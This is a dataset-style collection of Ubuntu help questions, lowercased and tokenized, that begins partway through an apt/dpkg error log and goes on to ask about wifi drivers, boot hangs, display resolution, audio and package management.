grub-gfxpayload-lists* grub-pc* grub-pc-bin* grub2-common* linux-headers-3.11.0-12-generic linux-headers-3.11.0-13-generic linux-image-3.11.0-13-generic linux-image-extra-3.11.0-13-generic 0 upgraded , 0 newly installed , 9 to remove and 0 not upgraded . 4 not fully installed or removed . after this operation , 178 mb disk space will be freed . do you want to continue ? [ y/n ] y ( reading database ... 284394 files and directories currently installed . ) removing linux-headers-3.11.0-12-generic ( 3.11.0-12.19 ) ... dpkg : error processing package linux-headers-3.11.0-12-generic ( -- remove ) : unable to securely remove '/usr/src/linux-headers-3.11.0-12-generic/include/config/yenta/ene/tune.h ' : not a directory removing linux-headers-3.11.0-13-generic ( 3.11.0-13.20 ) ... dpkg : error processing package linux-headers-3.11.0-13-generic ( -- remove ) : unable to securely remove '/lib/modules/3.11.0-13-generic/build ' : not a directory removing linux-image-extra-3.11.0-13-generic ( 3.11.0-13.20 ) ... dpkg : error processing package linux-image-extra-3.11.0-13-generic ( -- remove ) : unable to securely remove '/usr/share/doc/linux-image-extra-3.11.0-13-generic/changelog.debian.gz ' : not a directory removing linux-image-3.11.0-13-generic ( 3.11.0-13.20 ) ... dpkg : error processing package linux-image-3.11.0-13-generic ( -- remove ) : unable to securely remove '/lib/modules/3.11.0-13-generic/kernel/lib/ts_fsm.ko ' : not a directory no apport report written because maxreports is reached already errors were encountered while processing : linux-headers-3.11.0-12-generic linux-headers-3.11.0-13-generic linux-image-extra-3.11.0-13-generic linux-image-3.11.0-13-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) nasty @ nasty-vostro-a860 : ~ $ sudo apt-get install grub-pc reading package lists ... done building dependency tree reading state information ... done grub-pc is already the newest version . the following packages were automatically installed and are no longer required : linux-headers-3.13.0-24 linux-headers-3.13.0-24-generic linux-image-3.13.0-24-generic linux-image-extra-3.13.0-24-generic use 'apt-get autoremove ' to remove them . the following packages will be removed : linux-headers-3.11.0-12-generic linux-headers-3.11.0-13-generic linux-image-3.11.0-13-generic linux-image-extra-3.11.0-13-generic 0 upgraded , 0 newly installed , 4 to remove and 0 not upgraded . 4 not fully installed or removed . after this operation , 161 mb disk space will be freed . do you want to continue ? [ y/n ] y ( reading database ... 284394 files and directories currently installed . ) removing linux-headers-3.11.0-12-generic ( 3.11.0-12.19 ) ... dpkg : error processing package linux-headers-3.11.0-12-generic ( -- remove ) : unable to securely remove '/usr/src/linux-headers-3.11.0-12-generic/include/config/yenta/ene/tune.h ' : not a directory removing linux-headers-3.11.0-13-generic ( 3.11.0-13.20 ) ... dpkg : error processing package linux-headers-3.11.0-13-generic ( -- remove ) : unable to securely remove '/lib/modules/3.11.0-13-generic/build ' : not a directory removing linux-image-extra-3.11.0-13-generic ( 3.11.0-13.20 ) ... dpkg : error processing package linux-image-extra-3.11.0-13-generic ( -- remove ) : unable to securely remove '/usr/share/doc/linux-image-extra-3.11.0-13-generic/changelog.debian.gz ' : not a directory removing linux-image-3.11.0-13-generic ( 3.11.0-13.20 ) ... dpkg : error processing package linux-image-3.11.0-13-generic ( -- remove ) : unable to securely remove '/lib/modules/3.11.0-13-generic/kernel/lib/ts_fsm.ko ' : not a directory no apport report written because maxreports is reached already errors were encountered while processing : linux-headers-3.11.0-12-generic linux-headers-3.11.0-13-generic linux-image-extra-3.11.0-13-generic linux-image-3.11.0-13-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and i do n't understand what to do at the second option . well now i can not reinstall them ... ... nasty @ nasty-vostro-a860 : ~ $ sudo apt-get -- reinstall install linux-headers-3.11.0-12-generic linux-headers-3.11.0-13-generic linux-image-3.11.0-13-generic linux-image-extra-3.11.0-13-generic reading package lists ... done building dependency tree reading state information ... done package linux-image-extra-3.11.0-13-generic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package linux-image-3.11.0-13-generic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package linux-headers-3.11.0-13-generic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package linux-headers-3.11.0-12-generic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'linux-headers-3.11.0-12-generic ' has no installation candidate e : package 'linux-headers-3.11.0-13-generic ' has no installation candidate e : package 'linux-image-3.11.0-13-generic ' has no installation candidate e : package 'linux-image-extra-3.11.0-13-generic ' has no installation candidate
490845	wpc11 ver 3 with new install of lubuntu	i 'm trying to conect to wireless via an older sony vaio laptop that is using a linksys wpc11 card , version 3 . when i attempt to network connections only a wired connection is listed , tried to manually setup a wifi connection with all the required data but fails to save this information , i do n't have an option to connect to different networks in range so im assuming there may be a driver issue , im not certain im a new lubntu user and just looking for some suggestions , i 've heard this adapter should work right out of the box so ive reinstalled lubuntu afew times with the same results
490848	ubuntu on low performance laptop	my sister has always wanted a macbook , but i recently convinced her that ubuntu is a great os with much more similarity to mac os than windows . she said i can install ubuntu on her laptop but it is not really big on performance . specs : 1gb ram 120gb harddrive 128mb graphics i really like the look and feel of ubuntu and do n't want to install lubuntu or something like that . is there a way to run ubuntu in sort of a 'performance ' mode rather than 'appearance ' mode ? and what other settings can i adjust to increase the performance of the os ?
490850	arecord flac format	i am playing with scripts that use the google speech-to-text api . the api requires flac encoded files so the recording part of the script looks like this : arecord -q -t wav -d 0 -f s16_le -r 16000 | flac - -f -- best -- sample-rate 16000 -s -o `` $ temp_file '' this command will record until the user exits with ctrl-c and the wav recorded format should be piped to the flac program for outut in flac format , then the script should continue . the problem i am having is that pressing ctrl-c ends the script entirely and is cutting off some of the audio ( the flac file is still outputted ) . if i run the script without the pipe : arecord -q -t wav -d 0 -f s16_le -r 16000 some.wav then pressing ctrl-c will only ends the recording and continues on with the script as it should . how do i fix this so that ctrl-c only stops the arecord command and allows the rest of the script ( including the piped flac encoding ) to finish ?
490853	usb install , shows cursor only after choosing language in install	after choosing a language , the window that shows the progress of installation disappears leaving only the cursor .
490856	ubuntu 14.04 hangs after login	i am using ubuntu 14.04 on dell inspiron with intel graphics card . i am intermittently getting this issue where after login i ca n't see anything on status bar and my system is not usable , after which i have to restart my machine ( hard reboot ) . i have already referred : how to fix `` the system is running in low-graphics mode '' error ? . pressing ctrl+alt+f1 leads me to terminal which does not respond at all . i can only type into it and it does not have any effect . what are my options ?
490860	connecting to internet over wifi or tether , dhcp does not set dns	sorry for bad english . i 'm using ubuntu 14.04 64 bit and i have a strange internet connection problem . when i 'm at work i can access internet via dhcp wireless and wired without problems . when i 'm at home with wireless connection or when i use tethering hotspot with my mobile phone i cant connect internet using dhcp . the only way to connect internet is to set manually the dns ( 8.8.8.8 ) in network manager . why ? with ubuntu 12.04 i 've never set dns on dhcp and it worked fine ... thank you .
490864	why does convert add half an empty page	try running the following : pdftk a-i0778e.pdf cat 1 output page.pdf convert page.pdf page.jpeg ( or png , whatever you want ) returns a weird png file with left half blank and the image of the pdf on the right half.. any ideas why ? if you do convert on that full pdf btw , first page is still like that , and last page is the inverse ( image on left half , empty right half ) .. oddness..
490866	problems with desktop screen after login	i am running ubuntu 14.04-64bit . i have a hp pavilion dv7 laptop with a nvidia geforce gt 650m video card . i am not using the nvidia drivers that are in `` synaptic '' . this morning when i booted up , after i logged in , the desktop screen came up , but there was no `` task bar '' ( i think that is what you call the bar at the top of the screen ) & any program that was launched via the `` startup applications '' has no bar with the `` exit , minimize , whole scree '' buttons on it . i am able to kill any program using a terminal . the graphics is as it should be , no distortion . now i rebooted , and this time , after the login screen , i just get a `` black '' screen . i was unable to get anything to respond , so i had to hit the power button in order to exit and try another reboot . eventually , it all worked as it was suppose to , and i am now able to open any program and send this question to ya 'll . i am not sure where to begin to figure out what has happened , and i have not tried another reboot to see if the problem is still there or gone . if i need to give you more info , please let me know what ( an maybe how to get it ) and i will respond asap . thanks for your time looking at this , and i welcome any help you may be able to give .
490872	is it possible to âsshâ into my virtual machine remotely ?	my home computer : windows 7 laptop also running an ubuntu virtual machine via virtualbox with a bridged network connection ( as opposed to nat ) . my work computer : a windows 7 computer . i want to ssh into my home machine remotely from my work computer because i want to be able to run / manipulate my lamp webserver ( which involves mysql stuff , yes ) . i am running apache on the virtualbox and it would be great to have control from afar . to my understanding , ssh is a way to `` log in '' to your terminal remotely , yes ? i 've googled this subject ( which led me to things like putty ) but am having difficulty understanding how all of this works or what i need to set up or keep in mind as a beginner . however it would also be nice to have the ability to ssh in from anywhere , if possible ! that 'd be really convenient .
490876	problems getting 5.1 audio support over optical out ( make not completing as expected )	after some time figuring out what 's wrong with my hdmi audio i 've switched to optical out which seems to have fixed the stuttering i was getting in games . now i am having problems getting 5.1 audio out over optical . https : //help.ubuntu.com/community/digitalac-3pulseaudio following these instructions ( which maybe slightly out of date ) i get stuck on the first step of install plugin . i 'm relatively noobish at building in this manner . first off , is this the correct way to enable 5.1 audio of optical in 14.04 ? if yes then , when i get to 'cd a52/.libs ' this directory does not exit . this pastebin shows the out of the last command . these are the commands i ran ( as i said the instructions maybe slightly out of date ) . everything seemed to run fine to me . sudo gedit /etc/asound.conf sudo apt-get build-dep libasound2-plugins # ( errored so i ran the next line ) sudo apt-get install libjack0 sudo apt-get build-dep libasound2-plugins # ( pointed to alsa-plugins ) sudo apt-get build-dep alsa-plugins # ( ran this to be sure ) mkdir ~/tmp cd ~/tmp apt-get source libasound2-plugins cd alsa-plugins-* ./configure libtoolize -- force -- copy & & aclocal & & autoconf & & automake & & make # ( complained and said -- add-missing would fix ) libtoolize -- force -- copy & & aclocal & & autoconf & & automake -- add-missing & & make # ( output in pastbin link )
490881	run the script file after 5 or 10 min after restarting the system	i have created a ruby script file that checks the connection present or not . for example checking port 22 is opened or not . firstly i tried with cron job as follows @ reboot find $ { home } /my_app/check_conn.rb but it is executing immediately after starting the system . now i have to run this script after 5 or 10 min . how can i do this . is there any other way for doing this . thanks in advance .
490882	unable to boot into ubuntu or shell	okay so let 's start off with why im an idiot : i used sudo mv /lib/ld-linux-x86-64.so.2 lib64 i realize how stupid this is but it 's what i did and now i just want to fix it . i attempted to move it back but as most of you probably already know the mv function is dependent on /lib/ld-linux-x86-64.so.2 after googling the problem and having nothing work i tried to restart it . i am now unable to start my computer , i can not boot into shell , when i attempt to boot into a usb partition the exact same thing happens ( yes i am making sure it is booting to the usb not the hard drive ) . i can get to grub and bios but that is about it . here is the error i am getting on startup : begin : running /scripts/init-bottom ... done . [ 4.795453 ] sdb : sdb1 [ 4.798186 ] sd 8:0:0:0 : [ sdb ] no caching mode page present [ 4.798232 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 4.798267 ] sd 8:0:0:0 : [ sdb ] attached scsi removable disk run-init : /sbin/init : no such file or directory [ 4.937526 ] kernel panic - not syncing : attempted to kill init ! exitcode=0x00000100 [ 4.937526 ] once it gets to this point the cursor continues to blink but no input is accepted even ctrl+alt+delete to restart . the capslock and numlock buttons start flashing on my keybord i doubt that 's important but just in case . my first choice would be to restore the current build however i 've more or less given up hope on that and would settle wiping my computer and starting over . any help you can give would be greatly appreciated .
490892	ubuntu ca n't find arrogant bastard vortex mouse	i dualboot win7 and ubuntu and i 've gotten a new mouse , `` arrogant bastard vortex '' . but when in ubuntu , the mouse simply does n't respond . i 've tried different usb-ports and trying to unplug and replug it but it does n't help . i 'm not very familiar with ubuntu yet so what should i do ? i 've figured out that the mouse give rise to the following line when i execute lsusb : bus 001 device 007 id 04d9 : a081 holtek semiconductor , inc .
490893	how to download gimp from ubuntu apps directory	i would like to download both ubuntu and gimp to install on a computer with no internet connectivity . i presume simply downloading ubuntu and burning an iso disk will take care of the former . however , gimp directs me to https : //apps.ubuntu.com/cat/applications/saucy/gimp/ , and the emailed download link from there takes me back to https : //apps.ubuntu.com/cat/applications/saucy/gimp/ : i can not find anything on that page that would permit me to download gimp for ubuntu . walton
490898	radiance is selected , but title bars , menubar etc . are light-on-dark as on ambiance ( 14.04 )	i had an unexpected powerdown earlier today , due to laptop battery issues . since powering back up , my menubar and window title-bars are light-on-dark , as for the ambiance theme , even though radiance is selected . toggling between the two , other ui elements change appropriately , but the main menubar and window title bars seem stuck on ambiance . radiance had been working fine for me before the rough powerdown . any ideas on what might be causing this , or how to fix it ? iâm running 14.04 , on an hp spectre laptop , and am very much a linux novice ( recently switched from mac os ) .
490903	unable to print to brother printer by wifi	i have 2 computer with these configuration : kubuntu 14.04 64 bits and these brother printer : mfc-j6910dw the printer has wifi capabilities . i 've setup a fixed ip address : 192.168.1.191 . the router address is 191.168.1.1 i 've installed the drivers in both computers . both of the can do successfully : 192.168.1.1 i connect specifying these data : lpr : //192.168.1.131 the queue is binary_p1 i specify the right driver , supplied by brother . in computer a , i can print successfully , whereas in computer b , when i try to print something , it appears in the queue as a job , and it says it is completed , but never printed . no error message appears . why can i not print in computer 2 ? how can i diagnose the problem ? here is the official page for brother printers in linux : http : //support.brother.com/g/s/id/linux/en/index.html ? c=us_ot & lang=en & comple=on & redirect=on
490904	headphones with built-in mic	i have headphones that appear to have some kind of built-in mic , as well as a volume control and small button that may or may not control said mic . my machine has a headphone jack and a mic jack . when i plug the headphones in to the headphone jack , the mic does n't work , and pressing the button while speaking into the mic does n't help . when i plug them in to the mic jack , the headphones do n't work . the onboard audio card i 'm using is simple but modern : $ sudo lshw -c sound *-multimedia description : audio device product : juniper hdmi audio [ radeon hd 5700 series ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0.1 bus info : pci @ 0000:01:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:83 memory : fea40000-fea43fff *-multimedia description : audio device product : sbx00 azalia ( intel hda ) vendor : advanced micro devices , inc. [ amd/ati ] physical id : 14.2 bus info : pci @ 0000:00:14.2 version : 40 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=snd_hda_intel latency=32 resources : irq:16 memory : feb00000-feb03fff pulseaudio is set to use the latter device , which is otherwise 100 % working . any ideas on how i would use the headphones ' built-in mic ?
490907	what is causing my my screen to go black ?	i have this ubuntu ( 12.04.4 ) netbook hooked up to a 55 '' screen to display slides and info . it was running fine for quite a while and was set up not to go to screen saver or anything . i think there was a power outage last night so i came in and pressed the power button to turn it on . now when i turn the computer on , the screen is black . here 's the state of things ... user @ computer : ~ $ xrandr screen 0 : minimum 320 x 240 , current 320 x 240 , maximum 8192 x 8192 vga1 disconnected ( normal left inverted right x axis y axis ) lvds1 connected ( normal left inverted right x axis y axis ) 1024x768 60.0 + 60.0 800x600 60.3 56.2 640x480 59.9 dvi1 connected ( normal left inverted right x axis y axis ) 1920x1080 60.0 + 1600x900 60.0 1440x900 59.9 1360x768 59.8 60.0 1280x800 59.8 1280x720 60.0 1024x768 60.0 800x600 60.3 640x480 60.0 dp1 disconnected ( normal left inverted right x axis y axis ) i ssh in tried to do something like : xrandr -- output dvi1 -- mode 1920x1080 that did n't throw an error but did n't make the screen stop being black . i read that using `` -- off '' might help ( http : //www.linuxine.com/story/xrandr- can not -find-crtc-output-vga1 ) so i did something like this : xrandr -- output dvi1 -- off xrandr -- output lvds1 -- off xrandr -- output dvi1 -- mode 1920x1080 that worked ! then i kept sitting there for a few minutes and after maybe 5 or 10 minutes . the screen went black again ! what is going on here ... ? is there some sort of corruption i can resolve ? why would the screen go black again after it has already been initialized with xrandr ? edit : i forgot to mention ... when i reboot , it shows the bios on the monitor . it 's only after ubuntu starts up that it goes black . this is what makes me thing it is a software or configuration problem .
490912	ca n't show cbr pages	i am using ubuntu 14.04 and i want to open some cbr files . first i tried with evince . while i was using ubuntu 13.10 at different installation i can open with evince . after trying with evince , i installed comix . following screenshot shows when i open file with comix . i can read this file without any problem on my android tablet .
490913	upgraded to 14.04 and boot up hangs at restoring resolver state	i updated one of my workstations to 14.04 earlier today and the boot sequence is getting stuck at `` restoring resolver state '' . this happens just after two vmware services fail to start : the virtual machine monitor and the virtual machine communication interface . i am trying to avoid doing a clean reinstall and having to restore the system76 files , rebuild my windows vm with all of its research software , and having to reinstall iraf and matlab . any help would be greatly appreciated ! thanks !
490915	format 12.04lts and install newest version	i have 12.04lts installed but had troubles while upgrading it . all graphics configurations died and i can not change them . dash disappeared and the applications bar vanished . i can not upgrade or update cause i ca n't find the application . i just want to fully clean the disk and install the newest version of ubuntu . thanks
490916	why do i have a small rectangle on the bottom right of my mouse cursor	i am a complete linux noob . i have built a new computer and am really interested in linux and as such have installed ubuntu 13.10 on it to play around with and learn . my new computer is an asrock extreme 6+ with the amd a10 7850k kaveri processor and 8gb of corsair vengeance pro 1866 ram . my cursor has a small rectangle affixed to it that follows it around . whilst i can live with this i was just wondering if anyone has encountered this issue and possibly resolved it ?
490921	edubuntu offline package	is there any offline ( .deb ) installer for `` educational desktop for ubuntu '' ? i am using ubuntu 14.04 lts amd64 i have some problem with internet connection . an offline installer would help me : d
490922	ubuntu appends vlan tag to gre and vntag traffic ( from tcpreplay )	i have been running a set of scripts that play various pcaps via tcpreplay . i have been running on a ubuntu 12.04 , default lts , with tcpreplay built from source . what i 've noticed is whenever i play vntag or gre packets , the packets leaving my nic would have a vlan header of id=1 appended . i believe the linux networking stack is appending this vlan header , thinking the traffic is coming from a local vm . here is the kicker , i have disabled all of the following services ( that is virtualization and networking ) , and the header is still being appended . the services i 've disabled thus far are : 1 ) network-manager 2 ) virtual bridge 3 ) associated kvm ( libvirt ) services the next step i can think of is to rebuild the linux kernel with kvm disabled . does anyone have any suggestions on this ?
490923	windows all disapeared but are still running	i am running xubuntu , and i was playing around with unicode characters , when i noticed that all of my open windows and applications , except the text editor i was working with . somehow they 're still all running . i was listening to internet radio , and its still playing . is there a way to get my windows all back ? do i need to kill them all and re-open them ? or is there another solution entirely
490924	unable to shutdown & reboot ubuntu 14.04	i 'm using ubuntu 14.04 and i 'm not able to shut down or reboot my laptop . after pressing the reboot/shutdown button it just shows the purple screen & 5 dots . i 'm not able to understand where the problem is .
490932	wi-fi problem ubuntu 14.04	i have bcm4313 802.11bgn wireless network adapter ( rev 01 ) , with is not recognized on ubuntu 14.04 . what to do ?
490935	how do i reset or uninstall wifi adapter	my isp wifi is not connecting anymore . time warner asked if i could have ubuntu talk me through uninstall & reinstall ... . finding a usa 800 phone number was the first problem . now i am spending all my time searching for help . the error message i get every time now when wifi is trying to connect is as follows : `` wireless authentification required . passwords or encryption keys are required to access wireless network . ( password is already there in the box ) ( i click on connect and it tries but never authenticates , thus never connects ) please if there is anyone out there who can assist i would tremendously appreciate it . i am a user and need very simple instructions . thank you william los angeles
490939	configure gnome-shell extensions from command line	i like to run a couple of scripts to automatically install packages and do some configurations on fresh os installs . i use gnome shell with a few extensions and was thinking of improving my scripts to configure them . i usually configure the extensions using gnome-shell-extension-prefs or dconf-editor and i know how to edit other schemas from the command line . example : gsettings set org.gnome.desktop.background picture-options stretched but , although i can find and edit the installed extensions under org.gnome.shell.extensions using dconf-editor i ca n't access them using gsettings since they do n't seem to have an assigned schema : no such schema 'org.gnome.shell.extensions.extname' the only extensions accessible with gsettings seem to be the ones that came pre-installed . so , the question is , how can i configure the installed extensions from the command line ? is there any way to assign to gsettings the compiled schemas in ~/.local/share/gnome-shell/extensions/ ? maybe i 'm looking in the wrong direction . environment : ubuntu gnome 14.04 ( gnome shell 3.10.4 ) thanks in advance .
490940	samsung galaxy s 2 plus i9105p	when i will can install ubuntu touch to my device samsung galaxy s 2 plus i9105p with nfc
490941	low graphics mode	i have a hp pavilion 15-e055sx . i installed ubuntu 14.04 and after installation i get this error : the system is running in low graphics mode i have looked at how to fix `` the system is running in low-graphics mode '' error ? but it did n't help .
490942	setting the monitor resolution in lubuntu 14.04	i would like to enquire on how to change the monitor resolution in lubuntu 14.04 in a permanent manner . the monitor settings under preferences in the menu does not do the trick . when i say i want to change it in a permanent manner i mean that it wo n't change back after i logout/restart et cetera , i.e . i do not mean that it is not reversible/changeable . i need to do this because i notice my system is running slow , and that could be because it is an old system while the monitor was boughts years after the system itself ( a 21 inch widescreen monitor ) . i have no gpu besides what could be provided with the motherboard itself and i only have 1gb ram . the cpu is a dual-core celeron at 2.93ghz if i recall correctly . best regards , ederico .
490945	how much space does a given package , and dependencies , cost ?	given a package name , i want to find how much space would be freed up if the package , and its dependencies , were deleted . as dependencies might be shared between packages , maybe the right way to put it is : how much space does a package take , including all dependencies that are only beeing used by this package i would prefer cli solutions , because i would use them in scripts
490946	is ubuntu 14.04 using systemd ?	there was a lot of discussion about the init system for 14.04 before it was released , but i can not find any site that explains the outcome finally . so is ubuntu 14.04 using systemd now ?
490948	mouse/touchpad malfunctions	i have a fresh installation of kubuntu 14.04 . if my usb mouse is connected during restart , as soon as the mouse is moved after restart , both , touchpad and mouse , start malfunctioning . the cursor is still moveable but especially the left klick isnt recognized ( not entirely correct : i can open the main menu for example but cant open any applications afterwards , the right click seems to work however ) . if the mouse is connected but not moved the touchpad works fine . the only solution so far is unplugging and replugging the mouse ( at every reboot ) . edit : the bug occurs also with gnome and xfce and even during installation processes . edit2 : a workaround is clicking the right button first and the left afterwards on the desktop . this however lasts only until the next left action is done . the replugging solution is stable .
490950	create wifi hotspot on ubuntu	although many questions have already been asked regarding wifi hotspot , i did n't get any of the solutions working for me . i connect to the internet using a 3g dongle of huawei 3772 ( vodafone ) . the connection type is mobile broadband connection . i have to share this internet connection with my other devices like mobile phones and laptops . how can i create a wifi hotspot connection for this connection . i am using ubuntu 12.04 lts . i would like to note that i have already tried some help links from ubuntu but , they are so confusing that i could not understand them .
490951	xubuntu 14.04 - hdmi display no longer detected	i have a sager np8268 , and install xubuntu 14.04 . i have been using an external asus pb278q monitor for 3 weeks or so via hdmi . today , the monitor is no longer detected by xfce4-display-settings . would like to figure out how to get it working again using the automatic detection ; i do n't want to install a ppa , or manually maintain an xorg.conf . some information : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 32767 x 32767 edp1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1920x1080 60.0*+ 59.9 40.0 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gk104m [ geforce gtx 860m ] ( rev a1 ) ~ $ lshw -c video *-display description : vga compatible controller product : gk104m [ geforce gtx 860m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:51 memory : f6000000-f6ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f7000000-f707ffff *-display description : vga compatible controller product : 4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:52 memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) /var/log/xorg.0.log -- http : //pastebin.com/wfansf5v
490953	install new updates	the update manager has this message the package information was last updated 64days ago . lately i tried to upgrade from 12.04 to 14.04 but have these messages and i do n't really know how to solve it so that i can install the upgrade : w : failed to fetch http : //hu.archive.ubuntu.com/ubuntu/dists/hardy/universe/source/sources 404 not found w : failed to fetch http : //hu.archive.ubuntu.com/ubuntu/dists/hardy-updates/universe/source/sources 404 not found
490957	tesseract and hocr on ubuntu 14.04	i 've been having a problem with tesseract and hocr2pdf output since upgrading from 13.10 to 14.04 . tesseract now creates an .hocr file rather than an .html file for ocr output , but this is not exactly what is at issue here . when hocr2pdf uses this output it uses a large text size with small bounding boxes since the upgrade . most of the text does n't even appear in the resulting pdf , and what small amount of text does appear is unreadable and unselectable . i 'm using a script that goes through each .tif file in the directory and does the ocr on each one . i use a for loop like this : for page in `` $ dir '' /*page*.tif do base= '' $ { page % .tif } '' tesseract `` $ page '' `` $ base '' -l eng hocr hocr2pdf -i `` $ page '' -o `` $ base.pdf '' < `` $ base.hocr '' done i also tried specifying the resolution with a -r 400 switch to hocr2pdf , but this did not result in any changes . i can only assume that the current version of tesseract is not producing appropriate output for hocr2pdf to work with . any ideas what i can do to alleviate this problem ? tesseract is my only ocr option because it handles icelandic and old norse very well , so moving to another ocr tool is probably not a possibility .
490958	kernel panic after installing 64-bit ubuntu	recently discovered that my computer was 64-bit , and not 32-bit as i had originally thought , so i tried to install 64-bit ubuntu . the live session ( on a flash drive ) booted up fine , and i installed it as a reinstallation . after rebooting , i got a kernel panic . details are below : kernel panic - not syncing : attempted to kill init ! exitcode=0x00000100 cpu : 1 pid : 1 comm : run-init not tainted 3.13.0-30-generic # 54-ubuntu hardware name : system manufacturer system product name/p5gc-mx/1333 , bios 0317 04/15/2008 00000000 00000000 f6ca1f34 c164f6f3 c1933e00 f6ca1f54 c164a82c c182ba58 c1aa9c80 f6ca1f40 c1933e00 f612c8c0 f6c68000 f6ca1fa4 c105911f c182bd7c 00000100 c117929c 00000001 00000001 00000000 f6eaf188 f6e6cf24 f6eaf180 call trace : [ < c164f6f3 > ] dump_stack+0x41/0x52 [ < c164a82c > ] panic+0x87/0x181 [ < c105911f > ] do_exit+0x8ef/0x8f0 [ < c117929 > ] ? vfs_write+0x13c/0x1b0 [ < c1059156 > ] sys_exit+0x16/0x20 [ < c16567c7 > ] syscall_call+0x7/0xb
490959	why does suspend/resume fail to render desktop upon signing in 14.04 ?	my machine is a dell latitude e6510 with ubuntu 14.04 installed . whenever i suspend , either by clicking the suspend button from the system menu or by closing the laptop , and then resume , the log-in screen appears . for about 10 seconds , everything is frozen except mouse movement . i can move the mouse but i ca n't click on anything , ca n't enter text , and the mouse does n't change to acknowledge hovering over particular elements like a text input for instance . eventually , control is restored to me , then when i enter my password and log in , the screen displays just my desktop background image , the message 'system problem encountered ' sometimes flashes briefly , and then disappears . then , the screen remains just my desktop background image and i can not do anything but restart my machine . any help would be appreciated ! i will provide more specs if anybody believes they are relevant to this issue . http : //i.imgur.com/djkqkpm.jpg
490961	getting pid of program via terminal	i wont to get the pid of runnig program via the terminal . i searched here and in google and i did n't find how can i do that . which command give me the pid of running process ( es ) ?
490964	changed permissions , now gnome is acting unusual	i 'm the kind of guy who likes to make things easy for himself , and i believe i went too far . there was a single directory right under the / directory , but i can not recall which one at the time , and i switched all of the permissions for this directory to my user id . now that i have done this my computer has been running slow and and acting unusual . gnome is the biggest problem . as soon as i login , the system starts reporting errors and seemingly blaming these problems on gnome . is there a simple method to repair this problem without re-installing ubuntu ?
490968	blank screen after starting my laptop	i just replace windows 7 starter to ubuntu . it installed smoothly but now whenever i start my system it gives me blank screen . i am using lenovo ideapad s10-3s . how can i overcome this issue ?
490976	no space left on lvm	i resized my lvm partition on my harddisk , to make space for another ( system ) partition . now , i can mount and access the files on the lvm , but i try to create something new , i get the error , no space left on device . however , there should be plently of space ... in the file explorer it is also noted , that 0 bytes are left . however , i can create e.g . empty folders as root . any ideas ? $ df -h filesystem size used avail use % mounted on /dev/sda3 50g 4,0g 44g 9 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 3,9g 4,0k 3,9g 1 % /dev tmpfs 787m 1,2m 786m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 3,9g 548k 3,9g 1 % /run/shm none 100m 52k 100m 1 % /run/user /dev/mapper/lvm1-lv1 512g 495g 0 100 % /media/lvm $ df -i filesystem inodes iused ifree iuse % mounted on /dev/sda3 3325952 174963 3150989 6 % / none 1007089 2 1007087 1 % /sys/fs/cgroup udev 1004308 523 1003785 1 % /dev tmpfs 1007089 526 1006563 1 % /run none 1007089 4 1007085 1 % /run/lock none 1007089 9 1007080 1 % /run/shm none 1007089 35 1007054 1 % /run/user /dev/mapper/lvm1-lv1 34078720 67098 34011622 1 % /media/lvm $ mount /dev/mapper/lvm1-lv1 on /media/lvm type ext4 ( rw , noexec , nosuid , nodev )
490977	accessibility testing the web for the blind and low vision in linux	windows has jaws . mac desktop and ios has voiceover . what is the equivalent in the linux world ? i 'm willing to even load another desktop manager if need be . i currently use cinnamon 2.x on ubuntu 14.04 .
490980	libre office - create chart	i have some data that i have to represent using calc . if i select two columns that are next to each other ( $ mergesort. $ a $ 1 : $ b $ 101 ) the plot is created without any problem . however , i want to select data from different plots . according to the official website i should use a semicolon and select the columns in this way : $ mergesort. $ a $ 1 : $ a $ 101 ; $ mergesort. $ c $ 1 : $ c $ 101 however , when i add this thing as my datarange , the ok button at the dialog box gets deactivated and the text box turns to red . this happens just after i add a semicolon at the already selected area . am i doing something wrong ? by the way , i do not know if this plays any important role , but my chart is a line graph , and i also have data in both columns a and c my problem is also shown at the screenshots below
